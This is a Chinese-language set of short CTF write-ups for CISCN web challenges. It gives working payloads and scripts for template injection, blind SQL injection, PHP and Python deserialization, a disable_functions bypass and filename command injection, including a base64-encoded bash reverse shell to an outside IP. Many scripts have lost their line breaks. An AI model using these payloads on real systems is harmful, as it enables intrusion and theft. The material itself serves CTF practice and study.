目录

[CISCN 2019华东南]Web11

[CISCN 2019华北Day2]Web1

[CISCN 2019初赛]Love Math

[CISCN 2022 初赛]ezpop

[CISCN 2019华东南]Double Secret

[CISCN 2023 华北]ez_date

[CISCN 2019华北Day1]Web1

[CISCN 2019华东南]Web4

[CISCN 2019华北Day1]Web2 

[CISCN 2023 西南]do_you_like_read

[CISCN 2023 华北]pysym

[CISCN 2023 初赛]DeserBug

---

主打一个精简

[CISCN 2019华东南]Web11

 XFF处有Smarty模板注入

payload:

X-Forwarded-For: {if system('tac /flag')}{/if}

[CISCN 2019华北Day2]Web1

if(1=1,sleep(5),1) 测出可以时间盲注

脚本

import requestsurl = 'http://node4.anna.nssctf.cn:28396/index.php'
res = ""for i in range(1, 48, 1):for j in range(32, 128, 1):# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{j},sleep(0.5),0)#'# payload = f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{j},sleep(0.5),0)#"payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{j},sleep(1),0)"data = {'id': payload}try:r = requests.post(url=url, data=data,timeout=0.5)except Exception as e:continueres += chr(j)print(res)break

 

[CISCN 2019初赛]Love Math

这个waf只要不是纯数字，就会被认为是函数丢给白名单检测 

目标构造 

?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag

[]可以用{}来替代

_GET=hex2bin(5f474554) 

5f474554因为含一个f，所以要如下构造

5f474554=dechex(1598506324)

hex2bin可以用36进制来构造(从0-x共35个字符，用36进制)

base_convert()函数将10进制数转化为36进制的hex2bin

hex2bin=base_convert(37907361743,10,36) 

payload:

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag

[CISCN 2022 初赛]ezpop

参考文章：ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户

访问/www.zip拿到源码

找到反序列化入口为/index.php/index/index

exp

<?php
namespace think{abstract class Model{private $lazySave = false;private $data = [];private $exists = false;protected $table;private $withAttr = [];protected $json = [];protected $jsonAssoc = false;function __construct($obj = ''){$this->lazySave = True;$this->data = ['whoami' => ['cat /nssctfflag']];$this->exists = True;$this->table = $obj;$this->withAttr = ['whoami' => ['system']];$this->json = ['whoami',['whoami']];$this->jsonAssoc = True;}}
}
namespace think\model{use think\Model;class Pivot extends Model{}
}

[CISCN 2019华东南]Double Secret

访问/robots.txt

访问/secret，让传参secret

 随便传参报错，点开标记点

RC4解密，密钥是“HereIsTreasure”，可以利用flask的模板注入，执行命令，只不过先需要进行RC4加密。 

RC4加密脚本

import base64
from urllib import parsedef rc4_main(key="init_key", message="init_message"):  # 返回加密后得内容s_box = rc4_init_sbox(key)crypt = str(rc4_excrypt(message, s_box))return cryptdef rc4_init_sbox(key):s_box = list(range(256))j = 0for i in range(256):j = (j + s_box[i] + ord(key[i % len(key)])) % 256s_box[i], s_box[j] = s_box[j], s_box[i]return s_boxdef rc4_excrypt(plain, box):res = []i = j = 0for s in plain:i = (i + 1) % 256j = (j + box[i]) % 256box[i], box[j] = box[j], box[i]t = (box[i] + box[j]) % 256k = box[t]res.append(chr(ord(s) ^ k))cipher = "".join(res)return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))key = "HereIsTreasure"  # 此处为密文
message = input("请输入明文:\n")
enc_base64 = rc4_main(key, message)
enc_init = str(base64.b64decode(enc_base64), 'utf-8')
enc_url = parse.quote(enc_init)
print("rc4加密后的url编码:" + enc_url)
# print("rc4加密后的base64编码"+enc_base64)

注入payload:

{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}

[CISCN 2023 华北]ez_date

关于md5和sha1强相等

<?php
if(sha1(1)===sha1('1')&&md5(1)===md5('1')){echo "success";
}
//success

 关于data的利用： 

<?php
$str='\Z\3\r\4\y';
print(date($str));
//Z3r4y

exp

<?php
class date{public $a;public $b;public $file;
}
$a=new date();
$a->a=1;
$a->b='1';
$a->file='/f\l\a\g';
echo base64_encode(serialize($a));
?>

 payload:

?code=Tzo0OiJkYXRlIjozOntzOjE6ImEiO2k6MTtzOjE6ImIiO3M6MToiMSI7czo0OiJmaWxlIjtzOjg6Ii9mXGxcYVxnIjt9

[CISCN 2019华北Day1]Web1

 随便注册一个账号登录进去

在download.php可以下载各种文件源码进行审计

 

生成恶意phar包并改后缀上传

<?php
class User{public $db;public function __construct(){$this->db = new FileList();}
}class File{public $filename;}class FileList {private $files;public function __construct(){$file = new File();$file->filename = '/flag.txt';$this->files = array($file);}}$User = new User();$phar = new Phar("exp.phar"); //生成phar文件
$phar->startBuffering();
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($User); //触发类
$phar->addFromString("text.txt", "test"); //签名
$phar->stopBuffering();
?>

在delete.php抓包post传参，unlink触发phar反序列化

filename=phar://exp.png

 

[CISCN 2019华东南]Web4

抓包看响应头，是python框架

/read?url=/app/app.py

拿到源码

一眼session伪造

import re, random, uuid, urllib
from flask import Flask, session, requestapp = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True@app.route('/')
def index():session['username'] = 'www-data'return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'@app.route('/read')
def read():try:url = request.args.get('url')m = re.findall('^file.*', url, re.IGNORECASE)n = re.findall('flag', url, re.IGNORECASE)if m or n:return 'No Hack'res = urllib.urlopen(url)return res.read()except Exception as ex:print str(ex)return 'no response'@app.route('/flag')
def flag():if session and session['username'] == 'fuck':return open('/flag.txt').read()else:return 'Access denied'if __name__=='__main__':app.run(debug=True,host="0.0.0.0")

现有的session拿去jwt解密，内容base64解码就是www-data，我们只要找到secret-key就可了

python random生成的数是伪随机数，利用伪随机数的特性，只要种子是一样的，后面产生的随机数值也是一样的
uuid.getnode()，是网卡mac地址的十进制数，那我们就要知道网卡的mac地址，读取/sys/class/net/eth0/address

16进制转10进制：2485376933288

import randomrandom.seed(2485376933288)
randStr = str(random.random() * 233)
print randStr

修改session拿到flag

[CISCN 2019华北Day1]Web2 

题目要买到lv6的账号

脚本开爆

import requests
import time
for i in range(1,200):time.sleep(0.8)print(i)url = 'http://node4.anna.nssctf.cn:28867/shop?page={}'.format(i)r = requests.get(url)if 'lv6.png' in r.text:print("找到lv6-----{}".format(i))break

 

 

购买需要账号

随便注册个账号，发现钱不够，买不起

 但discount可以修改，回显/b1g_m4mber路由

 访问显示要admin

 垂直越权，爆jwt的secret_key 

改username为admin，伪造jwt 

 

拿着修改后的jwt访问/b1g_m4mber

右键查看源码拿到www.zip

 

 关注Admin.py，可以打pickle反序列化

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllibclass AdminHandler(BaseHandler):@tornado.web.authenticateddef get(self, *args, **kwargs):if self.current_user == "admin":return self.render('form.html', res='This is Black Technology!', member=0)else:return self.render('no_ass.html')@tornado.web.authenticateddef post(self, *args, **kwargs):try:become = self.get_argument('become')p = pickle.loads(urllib.unquote(become))return self.render('form.html', res=p, member=1)except:return self.render('form.html', res='This is Black Technology!', member=0)

python2环境下运行这段脚本 

import pickle
import urllibclass test(object):def __reduce__(self):return (eval, ("open('/flag.txt', 'r').read()",))a = test()
s = pickle.dumps(a)
print(urllib.quote(s))

[CISCN 2023 西南]do_you_like_read

拿到附件拖进Seay扫一下

 

注意到/bootstrap/test/bypass_disablefunc.php

<?phpecho "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";$cmd = $_GET["cmd"];$out_path = $_GET["outpath"];$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";putenv("EVIL_CMDLINE=" . $evil_cmdline);$so_path = $_GET["sopath"];putenv("LD_PRELOAD=" . $so_path);mail("", "", "", "");echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; unlink($out_path);
?>

同目录下有可利用的so文件

payload:

/bootstrap/test/bypass_disablefunc.php?cmd=env&outpath=/tmp/xx&sopath=/app/bootstrap/test/bypass_disablefunc_x64.so

[CISCN 2023 华北]pysym

题目提示无软链接

 附件给到源码

from flask import Flask, render_template, request, send_from_directory
import os
import random
import string
app = Flask(__name__)
app.config['UPLOAD_FOLDER']='uploads'
@app.route('/', methods=['GET'])
def index():return render_template('index.html')
@app.route('/',methods=['POST'])
def POST():if 'file' not in request.files:return 'No file uploaded.'file = request.files['file']if file.content_length > 10240:return 'file too lager'path = ''.join(random.choices(string.hexdigits, k=16))directory = os.path.join(app.config['UPLOAD_FOLDER'], path)os.makedirs(directory, mode=0o755, exist_ok=True)savepath=os.path.join(directory, file.filename)file.save(savepath)try:os.system('tar --absolute-names  -xvf {} -C {}'.format(savepath,directory))except:return 'something wrong in extracting'links = []for root, dirs, files in os.walk(directory):for name in files:extractedfile =os.path.join(root, name)if os.path.islink(extractedfile):os.remove(extractedfile)return 'no symlink'if  os.path.isdir(path) :return 'no directory'links.append(extractedfile)return render_template('index.html',links=links)
@app.route("/uploads/<path:path>",methods=['GET'])
def download(path):filepath = os.path.join(app.config['UPLOAD_FOLDER'], path)if not os.path.isfile(filepath):return '404', 404return send_from_directory(app.config['UPLOAD_FOLDER'], path)
if __name__ == '__main__':app.run(host='0.0.0.0',port=1337)

对文件名无过滤，可以直接命令拼接

payload:

exp.tar;echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjEn | base64 -d | bash;

 

成功反弹shell，拿到flag 

[CISCN 2023 初赛]DeserBug

【Web】记录CISCN2023国赛初赛DeserBug题目复现_deserbug ctf-CSDN博客